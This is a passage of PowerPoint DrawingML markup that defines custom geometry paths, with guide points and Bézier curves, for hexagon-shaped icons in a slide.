                  <a:gd name="connsiteY55" fmla="*/ 249669 h 381000"/>
                  <a:gd name="connsiteX56" fmla="*/ 119323 w 342900"/>
                  <a:gd name="connsiteY56" fmla="*/ 287684 h 381000"/>
                  <a:gd name="connsiteX57" fmla="*/ 116201 w 342900"/>
                  <a:gd name="connsiteY57" fmla="*/ 329441 h 381000"/>
                  <a:gd name="connsiteX58" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY58" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX59" fmla="*/ 161452 w 342900"/>
                  <a:gd name="connsiteY59" fmla="*/ 355340 h 381000"/>
                  <a:gd name="connsiteX60" fmla="*/ 89702 w 342900"/>
                  <a:gd name="connsiteY60" fmla="*/ 260976 h 381000"/>
                  <a:gd name="connsiteX61" fmla="*/ 95765 w 342900"/>
                  <a:gd name="connsiteY61" fmla="*/ 289551 h 381000"/>
                  <a:gd name="connsiteX62" fmla="*/ 94416 w 342900"/>
                  <a:gd name="connsiteY62" fmla="*/ 316849 h 381000"/>
                  <a:gd name="connsiteX63" fmla="*/ 37462 w 342900"/>
                  <a:gd name="connsiteY63" fmla="*/ 283931 h 381000"/>
                  <a:gd name="connsiteX64" fmla="*/ 89702 w 342900"/>
                  <a:gd name="connsiteY64" fmla="*/ 260976 h 381000"/>
                  <a:gd name="connsiteX65" fmla="*/ 23806 w 342900"/>
                  <a:gd name="connsiteY65" fmla="*/ 263919 h 381000"/>
                  <a:gd name="connsiteX66" fmla="*/ 148838 w 342900"/>
                  <a:gd name="connsiteY66" fmla="*/ 194881 h 381000"/>
                  <a:gd name="connsiteX67" fmla="*/ 90057 w 342900"/>
                  <a:gd name="connsiteY67" fmla="*/ 166373 h 381000"/>
                  <a:gd name="connsiteX68" fmla="*/ 62625 w 342900"/>
                  <a:gd name="connsiteY68" fmla="*/ 191310 h 381000"/>
                  <a:gd name="connsiteX69" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY69" fmla="*/ 209931 h 381000"/>
                  <a:gd name="connsiteX70" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY70" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX71" fmla="*/ 23806 w 342900"/>
                  <a:gd name="connsiteY71" fmla="*/ 263919 h 381000"/>
                  <a:gd name="connsiteX72" fmla="*/ 69061 w 342900"/>
                  <a:gd name="connsiteY72" fmla="*/ 154276 h 381000"/>
                  <a:gd name="connsiteX73" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY73" fmla="*/ 123825 h 381000"/>
                  <a:gd name="connsiteX74" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY74" fmla="*/ 184804 h 381000"/>
                  <a:gd name="connsiteX75" fmla="*/ 49227 w 342900"/>
                  <a:gd name="connsiteY75" fmla="*/ 171822 h 381000"/>
                  <a:gd name="connsiteX76" fmla="*/ 69061 w 342900"/>
                  <a:gd name="connsiteY76" fmla="*/ 154276 h 381000"/>
                  <a:gd name="connsiteX77" fmla="*/ 32190 w 342900"/>
                  <a:gd name="connsiteY77" fmla="*/ 100794 h 381000"/>
                  <a:gd name="connsiteX78" fmla="*/ 157176 w 342900"/>
                  <a:gd name="connsiteY78" fmla="*/ 172707 h 381000"/>
                  <a:gd name="connsiteX79" fmla="*/ 152290 w 342900"/>
                  <a:gd name="connsiteY79" fmla="*/ 107804 h 381000"/>
                  <a:gd name="connsiteX80" fmla="*/ 115062 w 342900"/>
                  <a:gd name="connsiteY80" fmla="*/ 96088 h 381000"/>
                  <a:gd name="connsiteX81" fmla="*/ 80288 w 342900"/>
                  <a:gd name="connsiteY81" fmla="*/ 72323 h 381000"/>
                  <a:gd name="connsiteX82" fmla="*/ 36630 w 342900"/>
                  <a:gd name="connsiteY82" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX83" fmla="*/ 32190 w 342900"/>
                  <a:gd name="connsiteY83" fmla="*/ 100794 h 381000"/>
                  <a:gd name="connsiteX84" fmla="*/ 102063 w 342900"/>
                  <a:gd name="connsiteY84" fmla="*/ 59741 h 381000"/>
                  <a:gd name="connsiteX85" fmla="*/ 125221 w 342900"/>
                  <a:gd name="connsiteY85" fmla="*/ 74733 h 381000"/>
                  <a:gd name="connsiteX86" fmla="*/ 152767 w 342900"/>
                  <a:gd name="connsiteY86" fmla="*/ 83715 h 381000"/>
                  <a:gd name="connsiteX87" fmla="*/ 158234 w 342900"/>
                  <a:gd name="connsiteY87" fmla="*/ 27270 h 381000"/>
                  <a:gd name="connsiteX88" fmla="*/ 102063 w 342900"/>
                  <a:gd name="connsiteY88" fmla="*/ 5974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42900" h="381000">
                    <a:moveTo>
                      <a:pt x="146636" y="6658"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="161992" y="-2219"/>
                      <a:pt x="180909" y="-2219"/>
                      <a:pt x="196264" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318087" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333442" y="85944"/>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="342900" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="333442" y="295065"/>
                      <a:pt x="318087" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="180909" y="383219"/>
                      <a:pt x="161992" y="383219"/>
                      <a:pt x="146636" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9459" y="295065"/>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="0" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="9459" y="85944"/>
                      <a:pt x="24814" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="6658"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="184448" y="27146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="183729" y="26727"/>
                      <a:pt x="182993" y="26346"/>
                      <a:pt x="182247" y="26013"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174431" y="83649"/>
                      <a:pt x="173848" y="114681"/>
                      <a:pt x="180444" y="168316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197733" y="153057"/>
                      <a:pt x="213193" y="141132"/>
                      <a:pt x="229353" y="131036"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224902" y="117577"/>
                      <a:pt x="221964" y="105708"/>
                      <a:pt x="220972" y="93202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="219919" y="79915"/>
                      <a:pt x="221101" y="66494"/>
                      <a:pt x="224338" y="50197"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="184448" y="27146"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="254038" y="213312"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="236937" y="204035"/>
                      <a:pt x="217980" y="196034"/>
                      <a:pt x="194280" y="187652"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214093" y="170031"/>
                      <a:pt x="230704" y="157505"/>
                      <a:pt x="248346" y="147190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="268124" y="135636"/>
                      <a:pt x="289599" y="126616"/>
                      <a:pt x="319017" y="116481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="319184" y="117662"/>
                      <a:pt x="319269" y="118872"/>
                      <a:pt x="319269" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319269" y="171069"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="303500" y="176422"/>
                      <a:pt x="291265" y="182118"/>
                      <a:pt x="280275" y="189690"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="270794" y="196225"/>
                      <a:pt x="262602" y="203902"/>
                      <a:pt x="254038" y="213312"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="246079" y="62770"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="304456" y="96507"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="283762" y="103832"/>
                      <a:pt x="266394" y="110909"/>
                      <a:pt x="250353" y="119139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="247112" y="108709"/>
                      <a:pt x="245221" y="100051"/>
                      <a:pt x="244531" y="91326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243855" y="82810"/>
                      <a:pt x="244294" y="73847"/>
                      <a:pt x="246079" y="62770"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="319269" y="196196"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="308733" y="200206"/>
                      <a:pt x="300729" y="204311"/>
                      <a:pt x="293674" y="209179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="287207" y="213627"/>
                      <a:pt x="281267" y="218904"/>
                      <a:pt x="274761" y="225743"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="289550" y="235515"/>
                      <a:pt x="303590" y="246802"/>
                      <a:pt x="319269" y="260737"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319269" y="196196"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="249635" y="237963"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="250233" y="238392"/>
                      <a:pt x="250861" y="238763"/>
                      <a:pt x="251509" y="239068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="270204" y="250174"/>
                      <a:pt x="287036" y="263471"/>
                      <a:pt x="307977" y="282369"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="307425" y="282750"/>
                      <a:pt x="306856" y="283112"/>
                      <a:pt x="306271" y="283445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="264416" y="307639"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="251485" y="296170"/>
                      <a:pt x="240173" y="288150"/>
                      <a:pt x="227807" y="282254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217147" y="277177"/>
                      <a:pt x="206120" y="273872"/>
                      <a:pt x="193293" y="271110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192989" y="251651"/>
                      <a:pt x="190826" y="232458"/>
                      <a:pt x="186747" y="210083"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="212958" y="219361"/>
                      <a:pt x="232329" y="227876"/>
                      <a:pt x="249635" y="237963"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="217646" y="303619"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="225688" y="307448"/>
                      <a:pt x="233540" y="312572"/>
                      <a:pt x="242722" y="320173"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="185779" y="353092"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="189340" y="331241"/>
                      <a:pt x="191714" y="312706"/>
                      <a:pt x="192745" y="295237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202425" y="297523"/>
                      <a:pt x="210275" y="300104"/>
                      <a:pt x="217646" y="303619"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="161452" y="355340"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="166806" y="323488"/>
                      <a:pt x="169585" y="299885"/>
                      <a:pt x="169695" y="277292"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169793" y="257232"/>
                      <a:pt x="167787" y="237668"/>
                      <a:pt x="163356" y="213541"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144741" y="228295"/>
                      <a:pt x="128367" y="239620"/>
                      <a:pt x="110885" y="249669"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115368" y="263195"/>
                      <a:pt x="118326" y="275111"/>
                      <a:pt x="119323" y="287684"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120349" y="300618"/>
                      <a:pt x="119253" y="313696"/>
                      <a:pt x="116201" y="329441"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158453" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="159428" y="354425"/>
                      <a:pt x="160430" y="354921"/>
                      <a:pt x="161452" y="355340"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="89702" y="260976"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="93091" y="271748"/>
                      <a:pt x="95057" y="280616"/>
                      <a:pt x="95765" y="289551"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96414" y="297742"/>
                      <a:pt x="96033" y="306343"/>
                      <a:pt x="94416" y="316849"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37462" y="283931"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="57633" y="275825"/>
                      <a:pt x="74457" y="268548"/>
                      <a:pt x="89702" y="260976"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23806" y="263919"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80256" y="241449"/>
                      <a:pt x="108894" y="226562"/>
                      <a:pt x="148838" y="194881"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126199" y="184852"/>
                      <a:pt x="107541" y="175908"/>
                      <a:pt x="90057" y="166373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81055" y="176384"/>
                      <a:pt x="72547" y="184480"/>
                      <a:pt x="62625" y="191310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51636" y="198882"/>
                      <a:pt x="39401" y="204578"/>
                      <a:pt x="23632" y="209931"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23632" y="261919"/>
                      <a:pt x="23691" y="262928"/>
                      <a:pt x="23806" y="263919"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="69061" y="154276"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54488" y="145437"/>
                      <a:pt x="39935" y="135636"/>
                      <a:pt x="23632" y="123825"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="184804"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="34168" y="180794"/>
                      <a:pt x="42171" y="176689"/>
                      <a:pt x="49227" y="171822"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55997" y="167164"/>
                      <a:pt x="62192" y="161601"/>
                      <a:pt x="69061" y="154276"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32190" y="100794"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="76219" y="133140"/>
                      <a:pt x="105898" y="149933"/>
                      <a:pt x="157176" y="172707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154103" y="147980"/>
                      <a:pt x="152472" y="127759"/>
                      <a:pt x="152290" y="107804"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138290" y="104927"/>
                      <a:pt x="126465" y="101527"/>
                      <a:pt x="115062" y="96088"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103284" y="90478"/>
                      <a:pt x="92463" y="82934"/>
                      <a:pt x="80288" y="72323"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="36630" y="97555"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="35022" y="98489"/>
                      <a:pt x="33537" y="99574"/>
                      <a:pt x="32190" y="100794"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="102063" y="59741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="110433" y="66484"/>
                      <a:pt x="117745" y="71171"/>
                      <a:pt x="125221" y="74733"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133253" y="78562"/>
                      <a:pt x="141852" y="81277"/>
                      <a:pt x="152767" y="83715"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153581" y="66704"/>
                      <a:pt x="155402" y="48711"/>
                      <a:pt x="158234" y="27270"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102063" y="59741"/>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A8412F2-BC74-ECB3-5EBD-D0912D7C422A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8709079" y="2054560"/>
                <a:ext cx="978742" cy="1087491"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY0" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX1" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY1" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX2" fmla="*/ 318087 w 342900"/>
                  <a:gd name="connsiteY2" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX3" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY3" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX4" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY4" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX5" fmla="*/ 318087 w 342900"/>
                  <a:gd name="connsiteY5" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX6" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY6" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX7" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY7" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX8" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY8" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY9" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX10" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY10" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX11" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY11" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX12" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY12" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX13" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY13" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX14" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY14" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX15" fmla="*/ 43972 w 342900"/>
                  <a:gd name="connsiteY15" fmla="*/ 93307 h 381000"/>
                  <a:gd name="connsiteX16" fmla="*/ 68968 w 342900"/>
                  <a:gd name="connsiteY16" fmla="*/ 96650 h 381000"/>
                  <a:gd name="connsiteX17" fmla="*/ 126575 w 342900"/>
                  <a:gd name="connsiteY17" fmla="*/ 87059 h 381000"/>
                  <a:gd name="connsiteX18" fmla="*/ 203800 w 342900"/>
                  <a:gd name="connsiteY18" fmla="*/ 60160 h 381000"/>
                  <a:gd name="connsiteX19" fmla="*/ 229320 w 342900"/>
                  <a:gd name="connsiteY19" fmla="*/ 53083 h 381000"/>
                  <a:gd name="connsiteX20" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY20" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX21" fmla="*/ 263791 w 342900"/>
                  <a:gd name="connsiteY21" fmla="*/ 73000 h 381000"/>
                  <a:gd name="connsiteX22" fmla="*/ 211648 w 342900"/>
                  <a:gd name="connsiteY22" fmla="*/ 82477 h 381000"/>
                  <a:gd name="connsiteX23" fmla="*/ 134386 w 342900"/>
                  <a:gd name="connsiteY23" fmla="*/ 109385 h 381000"/>
                  <a:gd name="connsiteX24" fmla="*/ 134375 w 342900"/>
                  <a:gd name="connsiteY24" fmla="*/ 109395 h 381000"/>
                  <a:gd name="connsiteX25" fmla="*/ 68742 w 342900"/>
                  <a:gd name="connsiteY25" fmla="*/ 120301 h 381000"/>
                  <a:gd name="connsiteX26" fmla="*/ 68715 w 342900"/>
                  <a:gd name="connsiteY26" fmla="*/ 120301 h 381000"/>
                  <a:gd name="connsiteX27" fmla="*/ 24493 w 342900"/>
                  <a:gd name="connsiteY27" fmla="*/ 113452 h 381000"/>
                  <a:gd name="connsiteX28" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY28" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX29" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY29" fmla="*/ 145780 h 381000"/>
                  <a:gd name="connsiteX30" fmla="*/ 68969 w 342900"/>
                  <a:gd name="connsiteY30" fmla="*/ 153429 h 381000"/>
                  <a:gd name="connsiteX31" fmla="*/ 126576 w 342900"/>
                  <a:gd name="connsiteY31" fmla="*/ 143837 h 381000"/>
                  <a:gd name="connsiteX32" fmla="*/ 203773 w 342900"/>
                  <a:gd name="connsiteY32" fmla="*/ 116948 h 381000"/>
                  <a:gd name="connsiteX33" fmla="*/ 203801 w 342900"/>
                  <a:gd name="connsiteY33" fmla="*/ 116938 h 381000"/>
                  <a:gd name="connsiteX34" fmla="*/ 263875 w 342900"/>
                  <a:gd name="connsiteY34" fmla="*/ 106118 h 381000"/>
                  <a:gd name="connsiteX35" fmla="*/ 263963 w 342900"/>
                  <a:gd name="connsiteY35" fmla="*/ 106118 h 381000"/>
                  <a:gd name="connsiteX36" fmla="*/ 264049 w 342900"/>
                  <a:gd name="connsiteY36" fmla="*/ 106118 h 381000"/>
                  <a:gd name="connsiteX37" fmla="*/ 318456 w 342900"/>
                  <a:gd name="connsiteY37" fmla="*/ 113633 h 381000"/>
                  <a:gd name="connsiteX38" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY38" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX39" fmla="*/ 263791 w 342900"/>
                  <a:gd name="connsiteY39" fmla="*/ 73000 h 381000"/>
                  <a:gd name="connsiteX40" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY40" fmla="*/ 202559 h 381000"/>
                  <a:gd name="connsiteX41" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY41" fmla="*/ 170040 h 381000"/>
                  <a:gd name="connsiteX42" fmla="*/ 68716 w 342900"/>
                  <a:gd name="connsiteY42" fmla="*/ 177079 h 381000"/>
                  <a:gd name="connsiteX43" fmla="*/ 68743 w 342900"/>
                  <a:gd name="connsiteY43" fmla="*/ 177079 h 381000"/>
                  <a:gd name="connsiteX44" fmla="*/ 134376 w 342900"/>
                  <a:gd name="connsiteY44" fmla="*/ 166173 h 381000"/>
                  <a:gd name="connsiteX45" fmla="*/ 134387 w 342900"/>
                  <a:gd name="connsiteY45" fmla="*/ 166164 h 381000"/>
                  <a:gd name="connsiteX46" fmla="*/ 211649 w 342900"/>
                  <a:gd name="connsiteY46" fmla="*/ 139255 h 381000"/>
                  <a:gd name="connsiteX47" fmla="*/ 264136 w 342900"/>
                  <a:gd name="connsiteY47" fmla="*/ 129778 h 381000"/>
                  <a:gd name="connsiteX48" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY48" fmla="*/ 138436 h 381000"/>
                  <a:gd name="connsiteX49" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY49" fmla="*/ 170621 h 381000"/>
                  <a:gd name="connsiteX50" fmla="*/ 264049 w 342900"/>
                  <a:gd name="connsiteY50" fmla="*/ 162896 h 381000"/>
                  <a:gd name="connsiteX51" fmla="*/ 263963 w 342900"/>
                  <a:gd name="connsiteY51" fmla="*/ 162896 h 381000"/>
                  <a:gd name="connsiteX52" fmla="*/ 263875 w 342900"/>
                  <a:gd name="connsiteY52" fmla="*/ 162896 h 381000"/>
                  <a:gd name="connsiteX53" fmla="*/ 203801 w 342900"/>
                  <a:gd name="connsiteY53" fmla="*/ 173717 h 381000"/>
                  <a:gd name="connsiteX54" fmla="*/ 203773 w 342900"/>
                  <a:gd name="connsiteY54" fmla="*/ 173727 h 381000"/>
                  <a:gd name="connsiteX55" fmla="*/ 126576 w 342900"/>
                  <a:gd name="connsiteY55" fmla="*/ 200616 h 381000"/>
                  <a:gd name="connsiteX56" fmla="*/ 68969 w 342900"/>
                  <a:gd name="connsiteY56" fmla="*/ 210207 h 381000"/>
                  <a:gd name="connsiteX57" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY57" fmla="*/ 202559 h 381000"/>
                  <a:gd name="connsiteX58" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY58" fmla="*/ 195215 h 381000"/>
                  <a:gd name="connsiteX59" fmla="*/ 264136 w 342900"/>
                  <a:gd name="connsiteY59" fmla="*/ 186557 h 381000"/>
                  <a:gd name="connsiteX60" fmla="*/ 211649 w 342900"/>
                  <a:gd name="connsiteY60" fmla="*/ 196034 h 381000"/>
                  <a:gd name="connsiteX61" fmla="*/ 134387 w 342900"/>
                  <a:gd name="connsiteY61" fmla="*/ 222942 h 381000"/>
                  <a:gd name="connsiteX62" fmla="*/ 134376 w 342900"/>
                  <a:gd name="connsiteY62" fmla="*/ 222952 h 381000"/>
                  <a:gd name="connsiteX63" fmla="*/ 68743 w 342900"/>
                  <a:gd name="connsiteY63" fmla="*/ 233858 h 381000"/>
                  <a:gd name="connsiteX64" fmla="*/ 68716 w 342900"/>
                  <a:gd name="connsiteY64" fmla="*/ 233858 h 381000"/>
                  <a:gd name="connsiteX65" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY65" fmla="*/ 226819 h 381000"/>
                  <a:gd name="connsiteX66" fmla="*/ 23632 w 342900"/>
                  <a:gd name="connsiteY66" fmla="*/ 259337 h 381000"/>
                  <a:gd name="connsiteX67" fmla="*/ 68969 w 342900"/>
                  <a:gd name="connsiteY67" fmla="*/ 266976 h 381000"/>
                  <a:gd name="connsiteX68" fmla="*/ 126576 w 342900"/>
                  <a:gd name="connsiteY68" fmla="*/ 257394 h 381000"/>
                  <a:gd name="connsiteX69" fmla="*/ 203773 w 342900"/>
                  <a:gd name="connsiteY69" fmla="*/ 230505 h 381000"/>
                  <a:gd name="connsiteX70" fmla="*/ 203801 w 342900"/>
                  <a:gd name="connsiteY70" fmla="*/ 230495 h 381000"/>
                  <a:gd name="connsiteX71" fmla="*/ 263875 w 342900"/>
                  <a:gd name="connsiteY71" fmla="*/ 219675 h 381000"/>
                  <a:gd name="connsiteX72" fmla="*/ 263963 w 342900"/>
                  <a:gd name="connsiteY72" fmla="*/ 219675 h 381000"/>
                  <a:gd name="connsiteX73" fmla="*/ 264049 w 342900"/>
                  <a:gd name="connsiteY73" fmla="*/ 219675 h 381000"/>
                  <a:gd name="connsiteX74" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY74" fmla="*/ 227400 h 381000"/>
                  <a:gd name="connsiteX75" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY75" fmla="*/ 195215 h 381000"/>
                  <a:gd name="connsiteX76" fmla="*/ 158453 w 342900"/>
                  <a:gd name="connsiteY76" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX77" fmla="*/ 43986 w 342900"/>
                  <a:gd name="connsiteY77" fmla="*/ 287703 h 381000"/>
                  <a:gd name="connsiteX78" fmla="*/ 68716 w 342900"/>
                  <a:gd name="connsiteY78" fmla="*/ 290636 h 381000"/>
                  <a:gd name="connsiteX79" fmla="*/ 68743 w 342900"/>
                  <a:gd name="connsiteY79" fmla="*/ 290636 h 381000"/>
                  <a:gd name="connsiteX80" fmla="*/ 134376 w 342900"/>
                  <a:gd name="connsiteY80" fmla="*/ 279721 h 381000"/>
                  <a:gd name="connsiteX81" fmla="*/ 211649 w 342900"/>
                  <a:gd name="connsiteY81" fmla="*/ 252813 h 381000"/>
                  <a:gd name="connsiteX82" fmla="*/ 264136 w 342900"/>
                  <a:gd name="connsiteY82" fmla="*/ 243326 h 381000"/>
                  <a:gd name="connsiteX83" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY83" fmla="*/ 251993 h 381000"/>
                  <a:gd name="connsiteX84" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY84" fmla="*/ 260909 h 381000"/>
